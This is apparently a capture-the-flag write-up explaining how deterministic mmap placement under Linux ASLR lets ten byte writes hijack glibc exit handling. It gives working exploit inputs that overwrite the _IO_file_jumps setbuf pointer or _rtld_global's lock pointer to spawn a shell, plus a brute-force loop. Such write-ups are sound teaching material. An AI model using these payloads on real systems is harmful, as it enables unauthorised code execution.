This task is about the determinism of ASLR as implemented by the Linux kernel (in early 2022): one of the mechanisms to obtain an ASLR'd piece of memory is the mmap system call, which (un)fortunately places allocations at predictable relative distances from each other. The task description linked a proposed patch set that remedies the issue by introducing a randomize_va_space level 3 for full randomization, but so far it has not been adopted.
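To see this determinism in action, consider the following minimal sketch (our own illustration, not part of the challenge): two fresh anonymous mappings land at randomized absolute addresses, but at a constant distance from each other:
#include <inttypes.h>
#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    /* Two fresh anonymous mappings: their absolute addresses change on
       every run, but the kernel places them back to back, so their
       distance stays constant. */
    void *a = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    void *b = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    printf("a - b = 0x%" PRIxPTR "\n", (uintptr_t)a - (uintptr_t)b);
    return 0;
}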
The vulnerable program allows writing at most 10 (zehn = ten) bytes at user-specified offsets relative to the beginning of a freshly allocated chunk:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv)
{
    size_t size = 0;
    size_t idx = 0;
    unsigned int i = 0;
    unsigned char val = 0;
    unsigned char *ptr = NULL;
    size_t *doit = NULL;

    if (scanf("%zx", &size) != 1)
        goto fail;
    ptr = calloc(size, sizeof(unsigned char));
    if (!ptr)
        goto fail;
    if ((scanf("%zx", &size) != 1) || !((size < 11) && (size >= 0)))
        goto fail;
    doit = calloc(size, 2 * sizeof(size_t));
    if (!doit)
        goto fail;
    while ((i < size) && (scanf("%zx %hhx", &idx, &val) == 2)) {
        doit[2 * i] = idx;
        doit[2 * i + 1] = val;
        i++;
    }
    for (i = 0; i < size; i++) {
        ptr[doit[2 * i]] = (unsigned char)doit[2 * i + 1];
    }
    exit(0);
fail:
    exit(-1);
}
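For reference, all input is parsed as hexadecimal: an allocation size, the number of writes (at most ten), then one offset/byte pair per write. A harmless example input:
0x21000 0x1 allocation size and number of bytes to write
0x0 0x41 write 0x41 ('A') at offset 0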
The first trick is that calloc/malloc fall back to allocating memory via mmap (instead of operating on the program break via sbrk) if the requested allocation size is at least mp_.mmap_threshold. We can confirm this by consulting the source code of the libc version shipped with the challenge. This is malloc.c from glibc-2.33, line 2403:
/*
   sysmalloc handles malloc cases requiring more memory from the system.
   On entry, it is assumed that av->top does not have enough
   space to service request for nb bytes, thus requiring that av->top
   be extended or replaced.
 */

static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
  mchunkptr old_top;              /* incoming value of av->top */
  INTERNAL_SIZE_T old_size;       /* its size */
  char *old_end;                  /* its end address */
  long size;                      /* arg to first MORECORE or mmap call */
  char *brk;                      /* return value from MORECORE */
  long correction;                /* arg to 2nd MORECORE call */
  char *snd_brk;                  /* 2nd return val */
  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
  char *aligned_brk;              /* aligned offset into brk */
  mchunkptr p;                    /* the allocated/returned chunk */
  mchunkptr remainder;            /* remainder from allocation */
  unsigned long remainder_size;   /* its size */
  size_t pagesize = GLRO (dl_pagesize);
  bool tried_mmap = false;

  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
          && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      char *mm;           /* return value from mmap call*/

    try_mmap:
      /*
         Round up size to nearest page. For mmapped chunks, the overhead
         is one SIZE_SZ unit larger than for normal chunks, because there
         is no following chunk whose prev_size field could be used.
         See the front_misalign handling below, for glibc there is no
         need for further alignments unless we have have high alignment.
       */
      if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
      else
        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
      tried_mmap = true;

      /* Don't try if size wraps around 0 */
      if ((unsigned long) (size) > (unsigned long) (nb))
        {
          mm = (char *) (MMAP (0, size,
                               MTAG_MMAP_FLAGS | PROT_READ | PROT_WRITE, 0));
          // >% snip
The value of mp_.mmap_threshold can be set at run time via the M_MMAP_THRESHOLD parameter of the mallopt function. By default, the threshold is 0x20000. For example, a calloc(0x21000, 1) returns a chunk freshly allocated by mmap at a constant distance to all dynamic libraries in the address space. Hence, no ASLR leak is required to solve this challenge. Furthermore, even though the vulnerable program calls exit immediately after letting the player overwrite (at most) ten bytes, a lot of code is dispatched during exit handling, providing promising targets to reach code execution.
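This is easy to verify: the following sketch (our own test program, not challenge code) prints the distance between an above-threshold calloc chunk and an arbitrary libc symbol; the value is identical on every run despite ASLR:
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* 0x21000 >= mp_.mmap_threshold (0x20000 by default), so this chunk
       is served by mmap instead of the main heap. */
    unsigned char *ptr = calloc(0x21000, 1);

    /* system() serves as an arbitrary libc anchor; the printed delta is
       the same on every run, even with ASLR fully enabled. */
    printf("system - chunk = 0x%" PRIxPTR "\n",
           (uintptr_t)&system - (uintptr_t)ptr);
    return 0;
}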
From here, many approaches exist as to which data structure to overwrite. As part of this writeup, we will present two possible exploitation vectors.
During exit, glibc flushes and cleans up all data that might still reside in its internal buffers. During this operation, execution reaches the _IO_cleanup function, which calls _IO_unbuffer_all (the latter has been inlined into the given glibc binary, but this is not a problem for exploitation):
/* The following is a bit tricky. In general, we want to unbuffer the
   streams so that all output which follows is seen. If we are not
   looking for memory leaks it does not make much sense to free the
   actual buffer because this will happen anyway once the program
   terminated. If we do want to look for memory leaks we have to free
   the buffers. Whether something is freed is determined by the
   function sin the libc_freeres section. Those are called as part of
   the atexit routine, just like _IO_cleanup. The problem is we do
   not know whether the freeres code is called first or _IO_cleanup.
   if the former is the case, we set the DEALLOC_BUFFER variable to
   true and _IO_unbuffer_all will take care of the rest. If
   _IO_unbuffer_all is called first we add the streams to a list
   which the freeres function later can walk through. */
static void _IO_unbuffer_all (void);

static bool dealloc_buffers;
static FILE *freeres_list;

static void
_IO_unbuffer_all (void)
{
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
    {
      int legacy = 0;

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
        legacy = 1;
#endif

      if (! (fp->_flags & _IO_UNBUFFERED)
          /* Iff stream is un-orientated, it wasn't used. */
          && (legacy || fp->_mode != 0))
        {
#ifdef _IO_MTSAFE_IO
          int cnt;
#define MAXTRIES 2
          for (cnt = 0; cnt < MAXTRIES; ++cnt)
            if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
              break;
            else
              /* Give the other thread time to finish up its use of the
                 stream. */
              __sched_yield ();
#endif

          if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
            {
              fp->_flags |= _IO_USER_BUF;

              fp->_freeres_list = freeres_list;
              freeres_list = fp;
              fp->_freeres_buf = fp->_IO_buf_base;
            }

          _IO_SETBUF (fp, NULL, 0); /* !!! attack here !!! */

          if (! legacy && fp->_mode > 0)
            _IO_wsetb (fp, NULL, NULL, 0);

#ifdef _IO_MTSAFE_IO
          if (cnt < MAXTRIES && fp->_lock != NULL)
            _IO_lock_unlock (*fp->_lock);
#endif
        }

      /* Make sure that never again the wide char functions can be
         used. */
      if (! legacy)
        fp->_mode = -1;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif
}
The function traverses _IO_list_all and calls _IO_SETBUF on each stream that is still buffered, in order to unbuffer it. Due to glibc's internal structure, the call to _IO_SETBUF is hijackable. This is because stdio's functionality is implemented via vtables, which happen to be lists of function pointers residing in writeable memory. Some sanitization is performed on those pointers at run time via _IO_vtable_check, but it only validates the vtable pointer itself (it must point into the __libc_IO_vtables section); since we will overwrite an entry inside that writeable section rather than the pointer, the check does not trigger in our case.
To understand what's going on, we need the definition of struct _IO_FILE, which is wrapped by struct _IO_FILE_complete, as defined in struct_FILE.h (line 46):
/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code. */
struct _IO_FILE
{
  int _flags;             /* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;     /* Current read pointer */
  char *_IO_read_end;     /* End of get area. */
  char *_IO_read_base;    /* Start of putback+get area. */
  char *_IO_write_base;   /* Start of put area. */
  char *_IO_write_ptr;    /* Current put pointer. */
  char *_IO_write_end;    /* End of put area. */
  char *_IO_buf_base;     /* Start of reserve area. */
  char *_IO_buf_end;      /* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base;    /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end;     /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset;    /* This used to be _offset but it's too small. */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff. */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again. */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
This structure is embedded into a struct _IO_FILE_plus, meaning that there is another trailing pointer, which points to the vtable:
struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};
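As a quick sanity check of the offsets involved (using only the public FILE definition; the mirrored struct below is our own), the vtable pointer lands at offset 0xd8 on x86-64, matching the disassembly further below:
#include <stddef.h>
#include <stdio.h>

struct _IO_jump_t;                  /* opaque for this check */

struct file_plus_sketch {           /* mirrors struct _IO_FILE_plus */
    FILE file;
    const struct _IO_jump_t *vtable;
};

int main(void)
{
    /* Prints 0xd8 on x86-64 glibc, since sizeof(FILE) == 216. */
    printf("vtable offset = 0x%zx\n",
           offsetof(struct file_plus_sketch, vtable));
    return 0;
}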
Putting all of this together, the memory layout looks as follows:
.data:00000000001C0800 public _IO_2_1_stdin_
.data:00000000001C0800 _IO_2_1_stdin_ dd 0FBAD2088h ; DATA XREF: LOAD:0000000000009B40↑o
.data:00000000001C0800 ; .got:_IO_2_1_stdin__ptr↑o ...
.data:00000000001C0804 dq 0 ; _IO_read_ptr
.data:00000000001C080C dq 0 ; _IO_read_end
.data:00000000001C0814 dq 0 ; _IO_read_base
.data:00000000001C081C dq 0 ; _IO_write_base
.data:00000000001C0824 dq 0 ; _IO_write_ptr
.data:00000000001C082C dq 0 ; _IO_write_end
.data:00000000001C0834 dq 0 ; _IO_buf_base
.data:00000000001C083C dq 0 ; _IO_buf_end
.data:00000000001C0844 dq 0 ; _IO_save_base
.data:00000000001C084C dq 0 ; _IO_backup_base
.data:00000000001C0854 dq 0 ; _IO_save_end
.data:00000000001C085C dq 0 ; _markers
.data:00000000001C0864 dq 0 ; _chain
.data:00000000001C086C dd 0 ; _fileno
.data:00000000001C0870 dd 0 ; _flags2
.data:00000000001C0874 dq 0FFFFFFFF00000000h ; _old_offset
.data:00000000001C087C dw 0FFFFh ; _cur_column
.data:00000000001C087E db 0FFh ; _vtable_offset
.data:00000000001C087F db 0FFh ; _shortbuf
.data:00000000001C0880 db 0
.data:00000000001C0881 db 0
.data:00000000001C0882 db 0
.data:00000000001C0883 db 0
.data:00000000001C0884 db 0
.data:00000000001C0885 db 0
.data:00000000001C0886 db 0
.data:00000000001C0887 db 0
.data:00000000001C0888 dq offset _IO_stdfile_0_lock ; _lock
.data:00000000001C0890 dq 0FFFFFFFFFFFFFFFFh ; _offset
.data:00000000001C0898 dq 0 ; _codecvt
.data:00000000001C08A0 dq offset _IO_wide_data_0 ; _wide_data
.data:00000000001C08A8 dq 0 ; _freeres_list
.data:00000000001C08B0 dq 0 ; _freeres_buf
.data:00000000001C08B8 dq 0 ; __pad5
.data:00000000001C08C0 dd 0 ; _mode
.data:00000000001C08C4 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ; _unused2
.data:00000000001C08C4 db 0, 0
.data:00000000001C08D8 dq offset __GI__IO_file_jumps ; vtable
Combine the knowledge of this data structure with the assembly of _IO_cleanup/_IO_unbuffer_all:
; %< snip >%
.text:0000000000083A53 loc_83A53: ; CODE XREF: _IO_cleanup+6E↑j
.text:0000000000083A53 mov eax, dword ptr cs:list_all_lock+4
.text:0000000000083A59 mov r14, cs:__GI__IO_list_all
; >% snip %<
.text:0000000000083B1C loc_83B1C: ; CODE XREF: _IO_cleanup+14F↑j
.text:0000000000083B1C ; _IO_cleanup+2B6↓j
.text:0000000000083B1C mov rax, [r14+0D8h]
; >% snip %<
.text:0000000000083B32 loc_83B32: ; CODE XREF: _IO_cleanup+317↓j
.text:0000000000083B32 xor edx, edx
.text:0000000000083B34 xor esi, esi
.text:0000000000083B36 mov rdi, r14
.text:0000000000083B39 call qword ptr [rax+58h]
First, r14 is initialized at 0x83a59 to point to the beginning of the file structure(s). Then, the vtable member at structure offset 0xd8 is loaded into rax. Within the _IO_file_jumps table, the function pointer at offset 0x58 is, unsurprisingly, __GI__IO_file_setbuf:
__libc_IO_vtables:00000000001C2300 __GI__IO_file_jumps dq 0 ; DATA XREF: LOAD:000000000000E358↑o
__libc_IO_vtables:00000000001C2300 ; check_stdfiles_vtables+B↑o ...
__libc_IO_vtables:00000000001C2300 ; Alternative name is '_IO_file_jumps'
__libc_IO_vtables:00000000001C2308 dq 0
__libc_IO_vtables:00000000001C2310 dq offset __GI__IO_file_finish
__libc_IO_vtables:00000000001C2318 dq offset __GI__IO_file_overflow
__libc_IO_vtables:00000000001C2320 dq offset __GI__IO_file_underflow
__libc_IO_vtables:00000000001C2328 dq offset __GI__IO_default_uflow
__libc_IO_vtables:00000000001C2330 dq offset __GI__IO_default_pbackfail
__libc_IO_vtables:00000000001C2338 dq offset __GI__IO_file_xsputn
__libc_IO_vtables:00000000001C2340 dq offset __GI__IO_file_xsgetn
__libc_IO_vtables:00000000001C2348 dq offset __GI__IO_file_seekoff
__libc_IO_vtables:00000000001C2350 dq offset _IO_default_seekpos
__libc_IO_vtables:00000000001C2358 dq offset __GI__IO_file_setbuf ; <- attackable pointer
__libc_IO_vtables:00000000001C2360 dq offset __GI__IO_file_sync
__libc_IO_vtables:00000000001C2368 dq offset __GI__IO_file_doallocate
__libc_IO_vtables:00000000001C2370 dq offset __GI__IO_file_read
__libc_IO_vtables:00000000001C2378 dq offset _IO_new_file_write
__libc_IO_vtables:00000000001C2380 dq offset __GI__IO_file_seek
__libc_IO_vtables:00000000001C2388 dq offset __GI__IO_file_close
__libc_IO_vtables:00000000001C2390 dq offset __GI__IO_file_stat
__libc_IO_vtables:00000000001C2398 dq offset _IO_default_showmanyc
__libc_IO_vtables:00000000001C23A0 dq offset _IO_default_imbue
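In C terms, the dispatch seen in the disassembly boils down to the following paraphrase (our reconstruction of the inlined code path, not glibc source):
#include <stddef.h>

typedef void *(*setbuf_fn)(void *fp, char *buf, int n);

static void dispatch_setbuf(unsigned char *fp)
{
    /* mov rax, [r14+0D8h]: load the vtable pointer of _IO_FILE_plus */
    void **vtable = *(void ***)(fp + 0xd8);

    /* call qword ptr [rax+58h]: index the __setbuf slot (0x58 / 8 = 11) */
    setbuf_fn fn = (setbuf_fn)vtable[0x58 / 8];

    /* rdi = fp: the FILE object itself becomes the first argument, which
       is exactly what makes the ";sh" trick described below work. */
    fn(fp, NULL, 0);
}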
From here, exploitation is straightforward: perform a 3-byte partial overwrite of the __GI__IO_file_setbuf pointer stored at libc_base+0x1C2358 so that it points to system, and write the string ;sh to address libc_base+0x1C0804 to set up the first argument for system. Since libraries are loaded at page-aligned addresses, the lowest 12 bits of system's address are known in advance; of the 24 bits we overwrite, only the remaining 12 have to be guessed, hence a 12-bit ASLR brute-force. The argument placement works because the dispatching call at libc_base+0x83B39 passes a pointer to the file structure itself to the callee. The file structure starts with the file magic 0xFBAD2088, which encodes several status bits, and since we prefer not to mess with the control flow's logic (we still have to reach the vulnerable call), we simply overwrite the 3 bytes immediately following the magic with ;sh. The ; terminates the meaningless garbage command formed by the magic bytes, and sh then gives us code execution.
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR brute-force:
0x30000 0x6 allocation size and number of bytes to write
0x1f5348 0xe0 partially overwrite _IO_file_jumps._IO_file_setbuf with pointer to system (XXXde0)
0x1f5349 0x7d
0x1f534a 0x13
0x1f37f4 0x3b overwrite _IO_2_1_stdin_._IO_read_ptr with ";sh"
0x1f37f5 0x73
0x1f37f6 0x68
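Since a failed guess crashes the target before anything interesting happens, the 12-bit brute-force reduces to re-running the exploit until a shell appears, roughly 4096 attempts on average. A hypothetical driver (binary and payload file names are assumptions; the classic cat trick keeps stdin open so a successful run drops into an interactive shell):
#include <stdlib.h>

int main(void)
{
    /* A wrong guess makes ./vuln die with SIGSEGV; a correct one spawns
       sh, which keeps reading commands from our terminal via cat.
       Break out of the loop manually once the shell appears. */
    for (;;)
        system("cat payload.txt - | ./vuln");
}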
The _dl_fini function is responsible for the destructor handling of dynamically loaded objects. It is (almost) always called on program termination, and it dispatches through globally writeable function pointers that can be overwritten to gain code execution. The interesting part is in lines 29 to 54 of dl-fini.c:
void
_dl_fini (void)
{
  /* Lots of fun ahead. We have to call the destructors for all still
     loaded objects, in all namespaces. The problem is that the ELF
     specification now demands that dependencies between the modules
     are taken into account. I.e., the destructor for a module is
     called before the ones for any of its dependencies.

     To make things more complicated, we cannot simply use the reverse
     order of the constructors. Since the user might have loaded objects
     using `dlopen' there are possibly several other modules with its
     dependencies to be taken into account. Therefore we have to start
     determining the order of the modules once again from the beginning. */

  /* We run the destructors of the main namespaces last. As for the
     other namespaces, we pick run the destructors in them in reverse
     order of the namespace ID. */
#ifdef SHARED
  int do_audit = 0;
 again:
#endif
  for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
      /* Protect against concurrent loads and unloads. */
      __rtld_lock_lock_recursive (GL(dl_load_lock));
Line 54 expands to GL(dl_rtld_lock_recursive) (&(GL(dl_load_lock)).mutex), which in turn expands to _rtld_global._dl_rtld_lock_recursive(&_rtld_global._dl_load_lock.mutex).
Since both are members of the writeable global variable _rtld_global, one can overwrite both the function pointer _dl_rtld_lock_recursive and the _dl_load_lock mutex to gain an easy system("sh") primitive. The _dl_rtld_lock_recursive pointer points to rtld_lock_default_lock_recursive in a single-threaded application, and to pthread_mutex_lock if the victim program was linked against libpthread. Both are a fair distance away from system, hence a 3-byte overwrite is required to reach code execution. Of the overwritten 3*8 = 24 bits, the lowest 12 are fixed at 0xde0 (the page offset of system within libc), leaving the remaining 12 ASLR'd bits to brute-force.
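Reduced to C, the primitive looks as follows (our paraphrase of the call site, with hypothetical parameter names):
typedef void (*lock_fn)(void *mutex);

/* Before our writes, dl_rtld_lock_recursive points to
   rtld_lock_default_lock_recursive (or pthread_mutex_lock) and the mutex
   holds lock state. After our writes, the pointer's low three bytes
   redirect it to system and the first mutex bytes spell "sh", so the
   call below effectively becomes system("sh"). */
static void dl_fini_lock_sketch(lock_fn dl_rtld_lock_recursive,
                                void *dl_load_lock_mutex)
{
    dl_rtld_lock_recursive(dl_load_lock_mutex);
}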
For the ld binary handed out with the challenge, this means writing "sh" to ld_base+0x30988, and a 24-bit value ending in 0xde0 (the last three nibbles of system@glibc) to ld_base+0x30f90.
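The chunk-relative write offsets in the payload below follow from the constant chunk-to-ld distance; a small check deriving them (the delta is computed from these very payload numbers, not measured independently):
#include <stdio.h>

int main(void)
{
    /* 0x1206978 (chunk-relative) hits ld_base+0x30988, so the chunk
       starts 0x11d5ff0 bytes below the ld base. */
    unsigned long delta = 0x1206978UL - 0x30988UL;

    printf("mutex   at chunk + 0x%lx\n", 0x30988UL + delta); /* 0x1206978 */
    printf("lock fn at chunk + 0x%lx\n", 0x30f90UL + delta); /* 0x1206f80 */
    return 0;
}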
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR brute-force:
0x1000000 0x5 allocation size and number of bytes to write
0x1206978 0x73 overwrite _rtld_global._dl_load_lock.mutex with "sh"
0x1206979 0x68
0x1206f80 0xe0 partially overwrite _rtld_global._dl_rtld_lock_recursive with pointer to system (XXXde0)
0x1206f81 0xbd
0x1206f82 0x4b